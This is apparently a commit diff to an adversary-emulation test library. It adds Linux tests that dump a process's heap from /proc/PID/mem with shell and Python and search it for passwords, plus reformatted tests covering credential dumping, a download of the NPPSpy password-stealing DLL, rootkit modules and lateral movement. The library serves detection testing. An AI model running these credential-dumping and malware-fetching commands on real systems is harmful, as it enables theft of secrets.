<br/>
## Atomic Test #1 - Dump individual process memory with sh (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
| pid_term | Unique string to use to identify target process | String | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
<br/>
<br/>
## Atomic Test #2 - Dump individual process memory with Python (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
| pid_term | Unique string to use to identify target process | String | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
##### Description: Requires Python
##### Check Prereq Commands:
```sh
(which python || which python3 || which python2)
```
##### Get Prereq Commands:
```sh
echo "Python 2.7+ or 3.4+ must be installed"
```
<br/>
+106
@@ -0,0 +1,106 @@
---
attack_technique: T1003.007
display_name: 'OS Credential Dumping: Proc Filesystem'
atomic_tests:
- name: Dump individual process memory with sh (Local)
auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
default: /tmp/T1003.007.sh
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"
cleanup_command: |
rm -f "#{output_file}"
- name: Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
description: |
Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
default: /tmp/T1003.007.bin
script_path:
description: Path to script generating the target process
type: Path
default: /tmp/T1003.007.sh
python_script:
description: Path to script generating the target process
type: Path
default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
pid_term:
description: Unique string to use to identify target process
type: String
default: T1003.007
dependencies:
- description: |
Script to launch target process must exist
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
get_prereq_command: |
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: |
Requires Python
prereq_command: |
(which python || which python3 || which python2)
get_prereq_command: |
echo "Python 2.7+ or 3.4+ must be installed"
executor:
name: sh
elevation_required: true
command: |
sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"
cleanup_command: |
rm -f "#{output_file}"
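Review bot: The heap size in test #1's `command` block converts the bounds to hex twice: `MEM_START` and `MEM_STOP` are already decimal after the `$((0x...))` expansions, so `$((0x$MEM_STOP-0x$MEM_START))` reinterprets those decimal digits as hex and hands `dd` a count far larger than the mapping, and the run presumably only terminates because reads past the mapping fail; `MEM_SIZE=$((MEM_STOP - MEM_START))` is the intended arithmetic. The `python_script` input in test #2 reuses the `script_path` description (`Path to script generating the target process`), which should read something like `Path to the Python script that dumps the target's heap`. Both are reproduced verbatim in the generated T1003.007 markdown section earlier in this commit, which appears to be rendered from this file.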
+31
@@ -0,0 +1,31 @@
#!/usr/bin/env python
'''Dump a process's heap space to disk
Usage:
python dump_proc.py <PID> <filepath>
'''
import argparse
parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
parser.add_argument('pid', type=int, help='ID of process to dump')
parser.add_argument('filepath', help='A filepath to save output to')
args = parser.parse_args()
process_id = args.pid
output_file = args.filepath
with open("/proc/{}/maps".format(process_id), "r") as maps_file:
# example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap]
heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
heap_range = heap_line.split(' ')[0]
mem_start = int(heap_range.split('-')[0], 16)
mem_stop = int(heap_range.split('-')[1], 16)
mem_size = mem_stop - mem_start
with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
mem_file.seek(mem_start, 0)
heap_mem = mem_file.read(mem_size)
with open(output_file, "wb") as ofile:
ofile.write(heap_mem)
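Review bot: `next(filter(lambda line: "[heap]" in line, maps_file))` raises a bare `StopIteration` when the target has no `[heap]` mapping or the PID is gone, leaving the operator with no indication of what failed; `heap_line = next((line for line in maps_file if "[heap]" in line), None)` followed by `if heap_line is None: raise SystemExit("no [heap] mapping found for pid {}".format(process_id))` reports it cleanly without a new import. The module docstring's usage line names `dump_proc.py`, while the YAML in this commit points `python_script` at `src/dump_heap.py`, so one of the two names looks stale. A short comment noting that the script needs privilege over the target to read `/proc/<pid>/mem` (the YAML marks the test `elevation_required: true`) would help anyone running it standalone.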
+10 -2
@@ -20,10 +20,14 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
**Supported Platforms:** Linux
**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
@@ -54,10 +58,14 @@ rm -f #{output_file}
**Supported Platforms:** Linux
**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
+12 -3
@@ -27,10 +27,14 @@ If you see a message saying "The system cannot find the path specified", try usi
**Supported Platforms:** Windows
**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder&#92;T1003&#92;bin&#92;gsecdump.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
@@ -51,7 +55,7 @@ If you see a message saying "The system cannot find the path specified", try usi
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -78,6 +82,10 @@ NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NP
**Supported Platforms:** Windows
**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
@@ -114,10 +122,11 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
##### Description: NPPSpy.dll must be available in local temp directory
##### Check Prereq Commands:
```powershell
if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
```
+1
@@ -61,6 +61,7 @@ atomic_tests:
- description: NPPSpy.dll must be available in local temp directory
prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
get_prereq_command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
executor:
command: |-
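Review bot: The added `SecurityProtocol` line pins the download to TLS 1.2, but the `Invoke-WebRequest` on the following (unchanged) line still writes `NPPSPY.dll` into `$env:Temp` with no integrity check; the commit-pinned URL constrains what is served, yet a recorded hash would make the prerequisite verifiable offline too. The gsecdump test in this same commit declares a `gsecdump_bin_hash` input for that purpose, and the same pattern would fit here, e.g. a `nppspy_dll_hash` input (constructed name) compared against `Get-FileHash` in the `prereq_command`. The enclosing atomic test starts outside the hunk.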
+5 -1
@@ -25,10 +25,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
**Supported Platforms:** Windows
**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| volume | Drive letter of the volume to access | string | C:|
+9 -1
@@ -19,6 +19,10 @@ Upon successful execution, cmd.exe will execute service commands with expected r
**Supported Platforms:** Windows
**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
@@ -47,10 +51,14 @@ Upon successful execution, net.exe will run from cmd.exe that queries services.
**Supported Platforms:** Windows
**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | Path | C:&#92;Windows&#92;Temp&#92;service-list.txt|
+6 -2
@@ -17,10 +17,14 @@ Upon successful execution, powershell will download the .cs from the Atomic Red
**Supported Platforms:** Windows
**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_source_code | Path to source of C# code | path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
| output_file_name | Name of output binary | string | %TEMP%&#92;T1010.exe|
@@ -45,7 +49,7 @@ del /f /q /s #{output_file_name} >nul 2>&1
##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
##### Check Prereq Commands:
```powershell
if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+4
@@ -23,6 +23,10 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
**Supported Platforms:** Windows
**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
+18 -6
@@ -21,10 +21,14 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -50,7 +54,7 @@ sudo rmmod #{rootkit_name}
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
##### Check Prereq Commands:
```bash
if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
@@ -73,10 +77,14 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -104,7 +112,7 @@ sudo depmod -a
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
##### Check Prereq Commands:
```bash
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
@@ -136,10 +144,14 @@ This will simulate hiding a process.
**Supported Platforms:** Windows
**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| driver_path | Path to a vulnerable driver | Path | C:&#92;Drivers&#92;driver.sys|
| puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder&#92;T1014&#92;bin&#92;puppetstrings.exe|
@@ -159,7 +171,7 @@ This will simulate hiding a process.
##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+37 -5
@@ -33,6 +33,10 @@ Upon successful execution, cmd.exe will spawn multiple commands to list network
**Supported Platforms:** Windows
**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
@@ -63,6 +67,10 @@ Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules.
**Supported Platforms:** Windows
**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
@@ -89,6 +97,10 @@ Upon successful execution, sh will spawn multiple commands and output will be vi
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
@@ -118,6 +130,10 @@ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config works
**Supported Platforms:** Windows
**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
@@ -148,10 +164,14 @@ Upon successful execution, powershell will read top-128.txt (ports) and contact
**Supported Platforms:** Windows
**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to write port scan results | Path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
| portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
@@ -201,7 +221,7 @@ Remove-Item -ErrorAction ignore "#{output_file}"
##### Description: Test requires #{port_file} to exist
##### Check Prereq Commands:
```powershell
if (Test-Path "#{port_file}") {exit 0} else {exit 1}
if (Test-Path "#{port_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -222,10 +242,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
@@ -244,7 +268,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -263,10 +287,14 @@ A list of commands known to be performed by Qakbot for recon purposes
**Supported Platforms:** Windows
**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|
@@ -296,6 +324,10 @@ Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used
**Supported Platforms:** macOS
**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
+55 -11
@@ -39,6 +39,10 @@ Upon successful execution, cmd.exe will execute `net.exe view` and display resul
**Supported Platforms:** Windows
**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
@@ -66,6 +70,10 @@ Upon successful execution, cmd.exe will execute cmd.exe against Active Directory
**Supported Platforms:** Windows
**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
@@ -92,10 +100,14 @@ Upon successful execution, cmd.exe will execute nltest.exe against a target doma
**Supported Platforms:** Windows
**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_domain | Domain to query for domain controllers | String | domain.local|
@@ -123,6 +135,10 @@ Upon successful execution, cmd.exe will perform a for loop against the 192.168.1
**Supported Platforms:** Windows
**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
@@ -149,6 +165,10 @@ Upon successful execution, cmd.exe will execute arp to list out the arp cache. O
**Supported Platforms:** Windows
**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
@@ -175,6 +195,10 @@ Upon successful execution, sh will execute arp to list out the arp cache. Output
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -192,7 +216,7 @@ arp -a | grep -v '^?'
##### Description: Check if arp command exists on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
@@ -213,10 +237,14 @@ Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 an
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| start_host | Subnet used for ping sweep. | string | 1|
| stop_host | Subnet used for ping sweep. | string | 254|
@@ -246,6 +274,10 @@ Upon successful execution, powershell will identify the ip range (via ipconfig)
**Supported Platforms:** Windows
**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
@@ -277,10 +309,14 @@ Successful execution of this test will list dns zones in the terminal.
**Supported Platforms:** Windows
**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username including domain. | string | domain&#92;user|
| acct_pass | Account password. | string | password|
@@ -301,7 +337,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```powershell
if (python --version) {exit 0} else {exit 1}
if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -310,7 +346,7 @@ echo "Python 3 must be installed manually"
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```powershell
if (pip3 -V) {exit 0} else {exit 1}
if (pip3 -V) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -319,7 +355,7 @@ echo "PIP must be installed manually"
##### Description: adidnsdump must be installed and part of PATH
##### Check Prereq Commands:
```powershell
if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -339,10 +375,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
@@ -361,7 +401,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -381,10 +421,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
@@ -403,7 +447,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+5 -1
@@ -19,10 +19,14 @@ Deletes a created file
**Supported Platforms:** Windows
**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file | Exfiltration File | String | C:&#92;temp&#92;T1020_exfilFile.txt|
| domain | Destination Domain | url | https://google.com|
+11 -3
@@ -21,10 +21,14 @@ Attempt an RDP session via Remote Desktop Application to a DomainController.
**Supported Platforms:** Windows
**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
| domain | domain argument default %USERDOMAIN% | String | $Env:USERDOMAIN|
@@ -56,7 +60,7 @@ if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -75,10 +79,14 @@ Attempt an RDP session via Remote Desktop Application over Powershell
**Supported Platforms:** Windows
**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName | String | WIN-DC|
| username | Username | String | Administrator|
+21 -5
@@ -25,10 +25,14 @@ Connecting To Remote Shares
**Supported Platforms:** Windows
**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN&#92;Administrator|
| share_name | Examples C$, IPC$, Admin$ | String | C$|
@@ -57,10 +61,14 @@ Map Admin share utilizing PowerShell
**Supported Platforms:** Windows
**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Examples C$, IPC$, Admin$ | String | C$|
| map_name | Mapped Drive Letter | String | g|
@@ -88,10 +96,14 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
**Supported Platforms:** Windows
**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_path | File to copy and execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
| remote_host | Remote computer to receive the copy and execute the file | String | &#92;&#92;localhost|
@@ -112,7 +124,7 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -135,10 +147,14 @@ This technique is used by post-exploitation frameworks.
**Supported Platforms:** Windows
**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Remote computer to receive the copy and execute the file | String | output.txt|
| command_to_execute | Command to execute for output. | String | hostname|
+5 -1
@@ -27,10 +27,14 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | localhost|
+16 -4
@@ -23,6 +23,10 @@ Upon successful execution, powershell will "Enable-PSRemoting" allowing for remo
**Supported Platforms:** Windows
**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
@@ -49,10 +53,14 @@ Upon successful execution, powershell will execute ipconfig on localhost using `
**Supported Platforms:** Windows
**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host_name | Remote Windows Host Name | String | localhost|
| remote_command | Command to execute on remote Host | String | ipconfig|
@@ -79,10 +87,14 @@ An adversary may attempt to use Evil-WinRM with a valid account to interact with
**Supported Platforms:** Windows
**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
#### Inputs:
| Name | Description | Type | Default Value |
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | string | Domain&#92;Administrator|
| destination_address | Remote Host IP or Hostname | string | Target|
@@ -103,7 +115,7 @@ evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
##### Description: Computer must have Ruby Installed
##### Check Prereq Commands:
```powershell
if (ruby -v) {exit 0} else {exit 1}
if (ruby -v) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -114,7 +126,7 @@ Start-Process $file1 /S;
##### Description: Computer must have Evil-WinRM installed
##### Check Prereq Commands:
```powershell
if (evil-winrm -h) {exit 0} else {exit 1}
if (evil-winrm -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
+6 -2
@@ -19,10 +19,14 @@ Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expe
**Supported Platforms:** macOS, Linux
